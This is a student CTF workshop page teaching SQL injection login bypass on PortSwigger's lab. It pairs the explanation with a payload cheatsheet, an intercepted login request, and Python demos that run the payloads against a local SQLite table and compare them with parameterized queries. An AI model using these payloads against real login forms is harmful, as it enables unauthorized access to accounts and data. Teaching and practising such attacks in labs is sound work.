SPRING 2026 · CTF WORKSHOP SERIES · PSU

Injection
Attacks

If a website builds its database commands from what users type, an attacker can turn a simple login box into a way to read or change every record. Today we'll use that trick to log in without a password.

SCROLL TO BEGIN
SECTION 01 · LEARNING OBJECTIVES

What You'll Learn

By the end of this topic, you'll be able to spot, exploit, and prevent one of the most critical web vulnerabilities.

01
Identify
Locate injection points in web application input fields (login, search, filters).
02
Exploit
Perform a basic SQL injection to bypass authentication and gain unauthorized access.
03
Prevent
Apply input validation and parameterized queries to stop injection attacks.
SECTION 02 · CORE CONCEPTS

SQL Injection

When user input is dropped directly into a database query, attackers can change the structure of that query—turning data into code.

THE MECHANISM
Why it works
A single quote (') ends a string, and two hyphens (--) start a SQL comment that runs to the end of the line (MySQL needs whitespace after the -- and also accepts #). Combine them, and the rest of the query, including the password check, becomes a note the database ignores.
THE RULE
Data vs. Code
The system fails whenever it cannot tell data apart from code. Parameterized queries keep that line sharp; string concatenation erases it.
Turning the password check into a comment
A// What the server expects
SELECT * FROM users WHERE username = 'input' AND password = 'input';
B// What the attacker types into the login form
username: administrator'--
password: anything
C// What the database actually runs
SELECT * FROM users WHERE username = 'administrator'--' AND password = 'anything';
everything after -- is treated as a comment and ignored

The attacker closes the username string with a quote, then uses -- to comment out the password check. The query now matches on username alone, so the database returns the administrator row and the application logs the attacker in as that user. With an always-true payload such as ' OR 1=1-- the query matches every row instead, and the application typically takes the first one returned.

SECTION 03 · HOW IT WORKS

The 5‑Step Injection

From normal input to unauthorized access: how a tester probes for SQL injection.

01
Capture User Input
FIND EVERY FIELD THAT TOUCHES THE DATABASE
  • App accepts input from a form (username, password, search)
  • Input is concatenated directly into a database query on the server
02
Inject Malicious Input
BREAK OUT OF THE EXPECTED STRING
  • Attacker enters administrator'-- to terminate the quoted field
  • Payload changes query structure, not just values
03
Alter Query Logic
PROMOTE PAYLOAD FROM DATA TO CODE
  • Injected input is parsed as SQL, not stored as literal
  • Comment markers (-- in most engines, # on MySQL) discard the rest of the query
04
Execute Modified Query
LET THE DATABASE DO THE WORK
  • Database runs altered statement without complaint
  • Password verification skipped (commented out)
05
Gain Unauthorized Access
CONFIRM BYPASS END‑TO‑END
  • Attacker logged in as administrator, the row the truncated query matched (with an always-true payload the app takes the first row returned)
  • System treats all subsequent requests as that privileged account
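The concatenation described in Sections 02 and 03, as an added example that is not part of the workshop materials or of the PortSwigger lab: a Python script with an in-memory SQLite table (constructed sample users, not lab data) that builds the login query by string concatenation, runs the administrator'-- and ' OR 1=1-- payloads against it, and then runs the same inputs through a parameterized query to show why the injection stops working. The function names and the sample credentials are assumptions made for this example.

```python
import sqlite3

# Constructed sample data standing in for the lab's users table (not the lab's real data).
SAMPLE_USERS = [
    ("administrator", "s3cr3t-admin"),
    ("wiener", "peter"),
    ("carlos", "montoya"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database populated with the constructed users above."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """The concatenation pattern from Section 02: input is spliced into the SQL text,
    so a quote in the input ends the string and whatever follows is parsed as SQL."""
    return (
        "SELECT username FROM users WHERE username = '"
        + username
        + "' AND password = '"
        + password
        + "'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Runs the concatenated query. Returns the first matched username, or None.
    Input that breaks the SQL syntax makes sqlite3 raise OperationalError, which a
    real application might surface as a 500 error (itself a useful injection signal)."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized query: the SQL text is fixed when the code is written and the
    driver sends the values separately, so a quote in the input is only ever compared
    against the column, never parsed as part of the statement."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Same inputs against both implementations; returns {label: (vulnerable, safe)}."""
    conn = make_db()
    cases = {
        "real credentials": ("administrator", "s3cr3t-admin"),
        "wrong password": ("administrator", "guess"),
        "payload administrator'--": ("administrator'--", "anything"),
        "payload ' OR 1=1--": ("' OR 1=1--", "anything"),
    }
    return {
        label: (login_vulnerable(conn, u, p), login_safe(conn, u, p))
        for label, (u, p) in cases.items()
    }


if __name__ == "__main__":
    # The statement the database actually sees for the Section 02 payload (line C).
    print(build_vulnerable_query("administrator'--", "anything"))
    for label, (vuln, safe) in demo().items():
        print(f"{label:28s} vulnerable={vuln!r:18s} parameterized={safe!r}")
```

Run it with python3. The first line printed is the Section 02 "what the database actually runs" statement; the rows after it show that the two payloads log in through the concatenated query but fall through to None with the parameterized one. The ' OR 1=1-- row is the "first matching user" case: every row matches and fetchone() hands back administrator only because it happens to be the first row in the table.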
SECTION 04 · DEMO WALKTHROUGH
DEMO.
PortSwigger Lab: SQL injection login bypass
LAB
SQL injection: login bypass
BROWSER
Chrome / Safari
STATE
Lab opened, login visible
▶ SCRIPT
# Step 1: Try a normal login
Username: admin   Password: 1234 (any wrong password)
→ Expected: Login fails ("invalid credentials")

# Step 2: Inject the payload
Username: administrator'--   Password: anything
(Note: single quote, two hyphens, then a space)
→ Expected: You are logged in as administrator. Lab solved.

# The payload, anatomized
administrator'-- 
→ Closes the username string, comments out password check
Follow along on your laptop. We will run through this together.
SECTION 05 · COMMON PITFALLS

Troubleshooting

SYMPTOM: Payload looks correct but login fails
CAUSE: Modified the wrong request (not the lab's login request)
FIX: Ensure the POST goes to the lab host, not the main PortSwigger site

SYMPTOM: Injection has no effect
CAUSE: Missing space after -- (MySQL only treats -- as a comment when whitespace follows; the lab's administrator'-- works without one, but other targets may not)
FIX: Send -- followed by a space and check in Burp that the space survived; it is easy to lose in copy-paste, so encode it as %20 or use -- - instead

SYMPTOM: Changes don't affect the result
CAUSE: Edited the response, or replayed a request that had already been sent
FIX: Intercept and edit the request before it is sent, or resend it from Repeater

SYMPTOM: Server rejects the quote character
CAUSE: A filter strips or blocks the single quote before it reaches the query (the lab has no such filter, so on the lab this usually means the quote never arrived as typed)
FIX: Check in Burp what was actually sent: a browser form submits ' as %27, which the server decodes back to a quote. If a filter genuinely removes the quote, ' OR 1=1-- fails for the same reason, because the quote is what breaks out of the string; you would need an unquoted injection context, which this lab does not have
SECTION 06 · POP QUIZ

Test Your Knowledge

QUESTION 01 / 05
What is the primary cause of SQL injection vulnerabilities?
QUESTION 02 / 05
In the payload administrator'--, what is the purpose of the two hyphens?
QUESTION 03 / 05
Which of the following is the most effective defense against SQL injection?
QUESTION 04 / 05
You try admin'-- but nothing happens. What is the most likely mistake?
QUESTION 05 / 05
What is the key principle that parameterized queries enforce?
SECTION 07 · YOUR CHALLENGE

Now Do It Yourself

⏱ 5-10 MIN · ◉ BEGINNER
THE TASK
Use the provided lab to bypass the login form and gain access to the administrator account by modifying the login request.
SUCCESS CRITERION
Screenshot showing you are logged in as administrator (account page or admin dashboard visible).
HINTS
01
Look closely at how your input is used inside the login request.
02
Try breaking the query so the password check is ignored.
03
Use a payload like administrator'-- (with a space after hyphens).
CHEATSHEET · PAYLOADS & PATTERNS
PAYLOAD · WHAT IT DOES · WHEN TO USE

administrator'--
  Closes the username string and comments out the password check
  Login bypass when the username is known

' OR 1=1--
  Makes the WHERE clause true for every row; the app takes the first row returned
  Login bypass when the username is unknown

' OR '1'='1  (put it in the password field)
  Quoted always-true variant with no comment marker. AND binds tighter than OR, so it only works in the last clause of the WHERE; in the username field the AND password check still applies. Adding -- to it does not help, because the -- ends up inside the string literal
  Auth bypass where -- is filtered

'--
  Truncates the query without a syntax error. A bare ' that errors while '-- does not is the classic injectability probe
  Probing whether a field is injectable

' OR 1=1#
  Same as ' OR 1=1-- using MySQL's # line comment (a syntax error on other engines)
  When -- is stripped and the backend is MySQL
▶ INTERCEPTED REQUEST (Burp)
POST /login HTTP/1.1
Host: lab-portswigger.net
...
username=administrator'--&password=anything

Burp shows the quote as typed; a browser form submits it URL-encoded (username=administrator%27--), and the server decodes both to the same value.
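Added example (not part of the workshop materials or of the lab) that executes each cheatsheet payload against the same vulnerable concatenated login query on an in-memory SQLite table, so the table above can be checked rather than trusted. It also covers the two points the table only states: AND/OR precedence for the quoted always-true variant, and the fact that # is a MySQL-only comment marker. The sample users, the case labels and the function names are assumptions made for this example.

```python
import sqlite3

# Constructed sample rows standing in for the lab's users table (example data, not lab data).
SAMPLE_USERS = [
    ("administrator", "s3cr3t-admin"),
    ("wiener", "peter"),
    ("carlos", "montoya"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def run_login(conn: sqlite3.Connection, username: str, password: str):
    """The vulnerable concatenated login query every cheatsheet payload targets.
    Returns the usernames the WHERE clause matched (the app would log in as the first),
    or the string 'error' when the payload leaves the SQL unparsable."""
    sql = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    try:
        return [row[0] for row in conn.execute(sql).fetchall()]
    except sqlite3.Error:
        return "error"


# (field, payload) for each cheatsheet entry plus the two probes the prose describes.
CASES = {
    "administrator'-- in username": ("username", "administrator'--"),
    "' OR 1=1-- in username": ("username", "' OR 1=1--"),
    "' OR '1'='1 in username": ("username", "' OR '1'='1"),
    "' OR '1'='1 in password": ("password", "' OR '1'='1"),
    "' OR '1'='1-- in username": ("username", "' OR '1'='1--"),
    "bare ' in username (probe)": ("username", "'"),
    "'-- in username (probe)": ("username", "'--"),
    "' OR 1=1# in username": ("username", "' OR 1=1#"),
}


def evaluate_payloads() -> dict:
    """Runs every case; the other field gets a harmless value so only the payload matters."""
    conn = make_db()
    results = {}
    for label, (field, payload) in CASES.items():
        if field == "username":
            results[label] = run_login(conn, payload, "anything")
        else:
            # No valid username is needed: the trailing OR makes the whole WHERE true.
            results[label] = run_login(conn, "nobody", payload)
    return results


if __name__ == "__main__":
    for label, outcome in evaluate_payloads().items():
        print(f"{label:30s} -> {outcome}")
```

The output reads as a truth table for the cheatsheet: the two comment-based payloads log in, ' OR '1'='1 only works from the password field (in the username field the AND password check still applies, and with -- appended the comparison becomes '1'='1--', which is false), the bare quote errors while '-- does not, and ' OR 1=1# errors here because SQLite, like most non-MySQL engines, does not treat # as a comment.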
SECTION 08 · FURTHER READING

Go Deeper

01

PortSwigger: SQL Injection

Interactive labs and real attack scenarios to practice and deepen understanding.

02

OWASP SQL Injection Prevention Cheat Sheet

Industry‑standard defensive techniques and secure coding practices.

03

OWASP Top 10: Injection

High‑level overview of why injection remains critical and how it impacts real systems.

📎

Injection Attacks Handout (PDF)

Full workshop packet with the Day 3 reference notes and cheatsheet.

Questions?
Bring them to the CTF WhatsApp Group.
CyberTech Club @ PSU · Spring 2026